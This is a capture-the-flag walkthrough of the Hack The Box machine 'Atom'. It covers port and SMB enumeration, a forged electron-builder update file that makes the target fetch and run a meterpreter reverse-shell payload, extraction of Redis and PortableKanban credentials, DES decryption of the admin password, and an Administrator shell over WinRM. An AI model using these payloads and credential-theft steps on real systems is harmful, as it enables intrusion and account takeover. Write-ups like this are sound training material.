Atom - [HTB]

Cover Image for Atom - [HTB]

Table of Contents


    Atom is an easy-medium from Hack The Box machine where we have to craft a special .yml file in order to bypass a signature validation in order to obtain a reverse shell as the user yason. Then, in order to become root, we need to extract an encrypted password used in the PortableKanban program stored in a redis database, for a later decryption using a PortableKanban vulnerability.


    As always let's find all opened ports in the machine usingf nmap.

    # Nmap 7.91 scan initiated Sun Apr 18 07:09:51 2021 as: nmap -sS -p- -T5 -n -oN AllPorts.txt
    Nmap scan report for
    Host is up (0.24s latency).
    Not shown: 65528 filtered ports
    80/tcp   open  http
    135/tcp  open  msrpc
    443/tcp  open  https
    445/tcp  open  microsoft-ds
    5985/tcp open  wsman
    6379/tcp open  redis
    7680/tcp open  pando-pub
    # Nmap done at Sun Apr 18 07:23:48 2021 -- 1 IP address (1 host up) scanned in 837.94 seconds

    Then, we continue with a deeper scan in each opened port.

    # Nmap 7.91 scan initiated Sun Apr 18 07:42:44 2021 as: nmap -sC -sV -n -T5 -p80,135,443,445,5985,6379,7680 -oN Depth.txt
    Nmap scan report for
    Host is up (0.19s latency).
    80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
    |_http-title: Heed Solutions
    135/tcp  open  msrpc        Microsoft Windows RPC
    443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
    |_http-title: Heed Solutions
    | ssl-cert: Subject: commonName=localhost
    | Not valid before: 2009-11-10T23:48:47
    |_Not valid after:  2019-11-08T23:48:47
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
    5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    6379/tcp open  redis        Redis key-value store
    7680/tcp open  pando-pub?
    Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows
    Host script results:
    |_clock-skew: mean: 2h19m56s, deviation: 4h02m31s, median: -4s
    | smb-os-discovery: 
    |   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
    |   OS CPE: cpe:/o:microsoft:windows_10::-
    |   Computer name: ATOM
    |   NetBIOS computer name: ATOM\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2021-04-18T04:43:38-07:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2021-04-18T11:43:40
    |_  start_date: N/A
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Sun Apr 18 07:44:21 2021 -- 1 IP address (1 host up) scanned in 96.67 seconds

    Looking inside the http service seems like a software company where you can download a software named Heed. Fortunately, we do not have to reverse engineer it.

    Heed webpage

    Enumerating the samba service there is a shared folder named Software_Updates.

    kali@kali:~/Documents/HTB/Atom$ smbclient -L // -U ""
    Enter WORKGROUP\'s password: 
            Sharename       Type      Comment
            ---------       ----      -------
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
            IPC$            IPC       Remote IPC
            Software_Updates Disk      
    Reconnecting with SMB1 for workgroup listing.
    do_connect: Connection to failed (Error NT_STATUS_IO_TIMEOUT)
    Unable to connect with SMB1 -- no workgroup available

    Enumerating the folder there is a pdf that we can download.

    kali@kali:~/Documents/HTB/Atom$ smbclient //
    Enter WORKGROUP\root's password: 
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sun Apr 18 10:09:00 2021
      ..                                  D        0  Sun Apr 18 10:09:00 2021
      client1                             D        0  Sun Apr 18 10:09:00 2021
      client2                             D        0  Sun Apr 18 10:09:00 2021
      client3                             D        0  Sun Apr 18 10:09:00 2021
      UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 13:18:08 2021
    		4413951 blocks of size 4096. 1344947 blocks available
    smb: \> get UAT_Testing_Procedures.pdf
    getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (55.4 KiloBytes/sec) (average 55.4 KiloBytes/sec)

    Reading the document we learned that this application has been encoded with electron-builder and there is a server running inside the machine in charge of updating the application. Furthermore, we can upload updates in the client folders, which will be tested by the QA team to ensure it installs correctly.

    Looking on google for "electron-builder update exploit" appears a post about how to craft an latest.yml that allow us to execute commands remotely.


    In order to turn this into a reverse shell we need to do the following.

    First, we need to craft our payload with msfvenom, obtaining their sha512 hash in base64.

    kali@kali:/tmp$ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4445 -f exe > /tmp/h\'eedv.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 354 bytes
    Final size of exe file: 73802 bytes
    kali@kali:/tmp$ shasum -a 512 h\'eedv.exe | cut -d " " -f1 | xxd -r -p | base64

    Secondly, we need to craft our latest.yml payload, adding the hash we calculated before and changing the IP where the server will connect to. This payload will connect to our machine executing the h'eedv.exe file.

    Note: After a lot of trial and error, this is the one that work out for me.

    kali@kali:/tmp$ cat latest.yml
    version: 1.5.5
    path: http://<Attacking machine>/h'eedv.exe 
    sha512: gVVTy+MdPBns1hjE6EwL7L7kCB2O3Zhxm7npfOcYzLsc29IPYOMhfbHz0BSIN5IRGALGF8yzdY2F7XHUCfCKhw==
    releaseDate: '2021-11-23T11:17:02.627Z'

    Thirdly, we need to use msfconsole in order to handle the meterpreter session.

    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   
    msf6 exploit(multi/handler) > set lhost
    lhost =>
    msf6 exploit(multi/handler) > set lport 4445
    lport => 4445
    msf6 exploit(multi/handler) > exploit
    [*] Started reverse TCP handler on

    Fourthly, we need to create an HTTP server in the same folder where our payload was created.

    kali@kali:/tmp$ sudo python3 -m http.server 80
    [sudo] password for kali: 
    Serving HTTP on port 80 ( ...

    Finally, we need to upload the latest.yml into one of the client folders.

    kali@kali:/tmp$ smbclient // 
    Enter WORKGROUP\kali's password:  
    smb: \> put latest.yml client1\latest.yml              
    putting file latest.yml as \client1\latest.yml (0.2 kb/s) (average 0.3 kb/s)

    The result will be an opened session as the user jason, obtaining the user flag.

    [*] Sending stage (175174 bytes) to
    [*] Meterpreter session 3 opened ( -> at 2021-04-18 06:29:20 -0400
    meterpreter > shell
    Process 1564 created.
    Channel 1 created.
    Microsoft Windows [Version 10.0.19042.906]
    (c) Microsoft Corporation. All rights reserved.

    Privilege escalation

    Inside the jason's downloads folder there is a program named PortableKanban, which has a vulnerability associated capabable of decryting encrypted passwords. So, we need to find some credentials.

    kali@kali:~/Documents/HTB/Atom$ searchsploit PortableKanban
    ----------------------------------------------------------- ---------------------------------
     Exploit Title                                             |  Path
    ----------------------------------------------------------- ---------------------------------
    PortableKanban 4.3.6578.38136 - Encrypted Password Retriev | windows/local/
    ----------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results

    With further enumeration in the C:\Program Files\ directory there is the program named redis, which manages the databases for the program PortableKanban.

    In order to access to the redis manager we need the password for the default user which is stored in the file.

    C:\Program Files\Redis>type        
    # Redis configuration file example
    requirepass kidvscat_yes_kidvscat 

    Using redis-cli we can obtain the credentials for the Administrator user in PortableKanban.

    kali@kali:~/Documents/HTB/Atom$ redis-cli -h                                     │ret service organizations, or for illegal purposes (this is non-binding, these *** ignore law> auth kidvscat_yes_kidvscat
    OK> info  
    # Keyspace        
    [...][1]> SELECT 0
    OK> KEYS *
    1) "pk:ids:MetaDataClass"
    2) "pk:ids:User"
    3) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
    4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"> GET "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"

    Now, we can use the PortableKanban vulnerability in order to obtain the Administrator password. However, we need to modify the script so it decrypts directly the flag without crafting a PortableKanban.pk3 file. The modified script is the following.

    kali@kali:~/Documents/HTB/Atom$ cat 
    import json
    import base64
    from des import * #python3 -m pip install des
    import sys
            path = sys.argv[1]
            exit("Supply path to PortableKanban.pk3 as argv1")
    def decode(hash):
            hash = base64.b64decode(hash.encode('utf-8'))
            key = DesKey(b"7ly6UznJ")
            return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

    Executing the script we obtain the password.

    kali@kali:~/Documents/HTB/Atom$ python3 Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi 

    The password can be used to obtain a shell as Administrator, with evil-winrm, obtaining the root flag.

    kali@kali:~/Documents/HTB/Atom$ evil-winrm -u Administrator -p 'kidvscat_admin_@123' -i
    Evil-WinRM shell v2.3
    Info: Establishing connection to remote endpoint
    [0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> dir
        Directory: C:\Users\Administrator\Documents
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    -a----          4/2/2021   8:22 PM            608 dump.rdb
    -a----          4/2/2021  10:49 PM            204 run.bat
    [0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> cd ..\Desktop
    [0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt